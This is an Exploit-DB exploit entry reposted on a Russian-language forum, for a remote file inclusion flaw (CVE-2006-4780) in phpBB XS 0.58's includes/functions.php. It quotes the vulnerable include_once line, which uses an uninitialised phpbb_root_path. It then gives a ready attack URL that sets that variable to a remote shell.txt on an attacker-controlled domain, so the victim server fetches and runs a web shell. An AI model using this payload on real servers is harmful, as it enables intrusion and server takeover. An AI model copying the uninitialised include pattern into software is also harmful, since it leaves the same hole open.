Exploit phpBB XS 0.58 - 'functions.php' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2349
Проверка EDB
  1. Пройдено
Автор
AZZCODER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-4780
Дата публикации
2006-09-12
Код:
Author: AzzCoder

Vendor: http://www.phpbbxs.eu/

Vulnerable File: includes/functions.php

Vulnerable Code:

//The phpbb_root_path isn't initialize

include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );

Method To Use:

http://www.victim.com/[phpbb_xs]/includes/functions.php?phpbb_root_path=http://yourdomain.com/shell.txt?

# milw0rm.com [2006-09-12]
 
Источник
www.exploit-db.com

Похожие темы